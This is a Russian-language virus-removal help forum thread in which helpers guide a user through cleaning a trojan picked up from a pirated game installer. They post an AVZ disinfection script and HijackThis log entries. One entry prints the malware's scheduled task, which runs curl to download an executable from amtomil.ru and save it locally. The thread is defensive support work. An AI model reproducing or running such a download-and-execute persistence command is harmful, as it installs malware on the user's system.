senyaIvanov 0 Опубликовано 16 июля, 2017 Share Опубликовано 16 июля, 2017 (изменено) Здравствуйте, скачивал игру Superhot с известного сайта evrl скачал запустил установщик, 67% а тут бац MBAM обнаружает угрозу и отправляет в карантин, но боюсь что он оставил свои файлы, очень нужны файлы думаю что загрузил ещё Трои( (оч нужны файлы, просто я снимаю майнкрафт(да я очень тупой(чучуть), а там все оформление канала и образ персонажа() что делать? Логи постараюсь сделать Угроза скрывалась под именем msi.exe вот логи https://yadi.sk/d/8pprHnL73L6kTh(не понял как прекрипить) (это Collection Log) Здравствуйте, скачивал игру Superhot с известного сайта evrl скачал запустил установщик, 67% а тут бац MBAM обнаружает угрозу и отправляет в карантин, но боюсь что он оставил свои файлы, очень нужны файлы думаю что загрузил ещё Трои( (оч нужны файлы, просто я снимаю майнкрафт(да я очень тупой(чучуть), а там все оформление канала и образ персонажа() что делать? Логи постараюсь сделать Угроза скрывалась под именем msi.exe + вирус сделал запланированую задачу Изменено 16 июля, 2017 пользователем senyaIvanov Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 16 июля, 2017 Share Опубликовано 16 июля, 2017 (изменено) Здравствуйте!- Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); ClearQuarantineEx(true); QuarantineFile('C:\Users\Clery\AppData\Roaming\Microsoft\msi.exe', ''); QuarantineFileF('C:\Users\Clery\AppData\Roaming\curl\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0); DeleteFile('C:\Users\Clery\AppData\Roaming\Microsoft\msi.exe', '32'); ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true); DeleteFileMask('C:\Users\Clery\AppData\Roaming\curl\', '*', true); DeleteDirectory('C:\Users\Clery\AppData\Roaming\curl\'); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end. После выполнения скрипта компьютер перезагрузится. - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com Полученный ответ сообщите здесь (с указанием номера KLAN) - Перетащите лог Check_Browsers_LNK.log на утилиту ClearLNK. Отчёт о работе прикрепите. Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger. Изменено 16 июля, 2017 пользователем regist 1 Цитата Ссылка на сообщение Поделиться на другие сайты
senyaIvanov 0 Опубликовано 16 июля, 2017 Автор Share Опубликовано 16 июля, 2017 Здравствуйте! - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); ClearQuarantineEx(true); QuarantineFile('C:\Users\Clery\AppData\Roaming\Microsoft\msi.exe', ''); QuarantineFileF('C:\Users\Clery\AppData\Roaming\curl\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0); DeleteFile('C:\Users\Clery\AppData\Roaming\Microsoft\msi.exe', '32'); ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true); DeleteFileMask('C:\Users\Clery\AppData\Roaming\curl\', '*', true); DeleteDirectory('C:\Users\Clery\AppData\Roaming\curl\'); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end. После выполнения скрипта компьютер перезагрузится. - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com Полученный ответ сообщите здесь (с указанием номера KLAN) - Перетащите лог Check_Browsers_LNK.log на утилиту ClearLNK. Отчёт о работе прикрепите. Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger. Дело в том что мбам закинул его в карантин, мне вытащить его? Здравствуйте! - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); ClearQuarantineEx(true); QuarantineFile('C:\Users\Clery\AppData\Roaming\Microsoft\msi.exe', ''); QuarantineFileF('C:\Users\Clery\AppData\Roaming\curl\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0); DeleteFile('C:\Users\Clery\AppData\Roaming\Microsoft\msi.exe', '32'); ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true); DeleteFileMask('C:\Users\Clery\AppData\Roaming\curl\', '*', true); DeleteDirectory('C:\Users\Clery\AppData\Roaming\curl\'); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end. После выполнения скрипта компьютер перезагрузится. - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com Полученный ответ сообщите здесь (с указанием номера KLAN) - Перетащите лог Check_Browsers_LNK.log на утилиту ClearLNK. Отчёт о работе прикрепите. Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger. Все уже вижу, что он будет удален https://virusinfo.info/virusdetector/report.php?md5=355F8E2D989D2163543F1BCB7D1F65BF Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 16 июля, 2017 Share Опубликовано 16 июля, 2017 Есть поле быстрого ответа внизу, не надо заниматься оверквотингом. Это только затрудняет чтение. Все уже вижу, что он будет удален кто он не понятно. Где всё остальное? 1 Цитата Ссылка на сообщение Поделиться на другие сайты
senyaIvanov 0 Опубликовано 16 июля, 2017 Автор Share Опубликовано 16 июля, 2017 сейчас Есть поле быстрого ответа внизу, не надо заниматься оверквотингом. Это только затрудняет чтение. Все уже вижу, что он будет удаленкто он не понятно. Где всё остальное? Thank you for contacting Kaspersky LabThe files have been scanned in automatic mode.Malicious code detected by Kaspersky Lab products with KSN technology enabled has been found in the following files:msi.exe - UDS:DangerousObject.Multi.GenericNo information about the specified files can be found in the antivirus databases:curl_7_54.exeWe will thoroughly analyze the files you sent. If the result of the analysis is different from this automatic scan result, you will be notified via email.This is an automatically generated message. Please do not reply to it.Anti-Virus Lab, Kaspersky Lab HQ"39A/3 Leningradskoe Shosse, Moscow, 125212, RussiaTel./Fax: + 7 (495) 797 8700http://www.kaspersky.com http://www.viruslist.com"--------------------------------------------------------------------------------Sent: 7/16/2017 5:29:00 PMTo: newvirus@kaspersky.comSubject: Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 16 июля, 2017 Share Опубликовано 16 июля, 2017 сейчас И почему вы игнорируете и опять занимаетесь оверквотингом?! https://ru.wikipedia.org/wiki/Оверквотинг 1 Цитата Ссылка на сообщение Поделиться на другие сайты
senyaIvanov 0 Опубликовано 16 июля, 2017 Автор Share Опубликовано 16 июля, 2017 это clear ink log https://yadi.sk/i/HE_K3nPl3L6sZM простите Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 16 июля, 2017 Share Опубликовано 16 июля, 2017 И опять жду всё остальнео. И логи надо прикреплять к сообщению. 1 Цитата Ссылка на сообщение Поделиться на другие сайты
senyaIvanov 0 Опубликовано 16 июля, 2017 Автор Share Опубликовано 16 июля, 2017 сейчас дам новый лог https://yadi.sk/d/RpYwEs913L6spa у меня что то не получается прекрепить лог Цитата Ссылка на сообщение Поделиться на другие сайты
Mark D. Pearlstone 1 704 Опубликовано 16 июля, 2017 Share Опубликовано 16 июля, 2017 у меня что то не получается прекрепить логНажимайте кнопку "Расширенная форма", затем кнопку "Выберите файл", выбираете файл и жмёте кнопку "Загрузить" 1 Цитата Ссылка на сообщение Поделиться на другие сайты
senyaIvanov 0 Опубликовано 16 июля, 2017 Автор Share Опубликовано 16 июля, 2017 спасибо Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 16 июля, 2017 Share Опубликовано 16 июля, 2017 "Пофиксите" в HijackThis: O22 - Task (Ready): MSI - C:\Users\Clery\AppData\Roaming\Microsoft\msi.exe cnt=1 fts="vimetools___.exe" (file missing) O22 - Task (Ready): curl - C:\Users\Clery\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Clery\AppData\Roaming\curl\curl.exe" (file missing) O22 - Task (Ready): curls - C:\Users\Clery\AppData\Roaming\curl\curl.exe (file missing) Прикрепите свежий CollectionLog. 1 Цитата Ссылка на сообщение Поделиться на другие сайты
senyaIvanov 0 Опубликовано 16 июля, 2017 Автор Share Опубликовано 16 июля, 2017 "Пофиксите" в HijackThis: O22 - Task (Ready): MSI - C:\Users\Clery\AppData\Roaming\Microsoft\msi.exe cnt=1 fts="vimetools___.exe" (file missing) O22 - Task (Ready): curl - C:\Users\Clery\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Clery\AppData\Roaming\curl\curl.exe" (file missing) O22 - Task (Ready): curls - C:\Users\Clery\AppData\Roaming\curl\curl.exe (file missing) Прикрепите свежий CollectionLog. у меня вопрос, судя по таскам которые вы попросили пофиксить, это сделала программа vimetools___.exe, верно? вот свежий лог ой Я забыл перезагрузится качать этот CollectionLog-2017.07.16-19.03.zip тут такое дело, задачи не удалились, смотрел через прогу autoruns.exe CollectionLog-2017.07.16-18.45.zip CollectionLog-2017.07.16-19.03.zip Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 16 июля, 2017 Share Опубликовано 16 июля, 2017 Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.Отметьте галочкой также "Shortcut.txt".Нажмите кнопку Scan.После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению. 1 Цитата Ссылка на сообщение Поделиться на другие сайты
senyaIvanov 0 Опубликовано 17 июля, 2017 Автор Share Опубликовано 17 июля, 2017 Готово Жду дальнейших инструкций Shortcut.txt FRST.txt Addition.txt Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.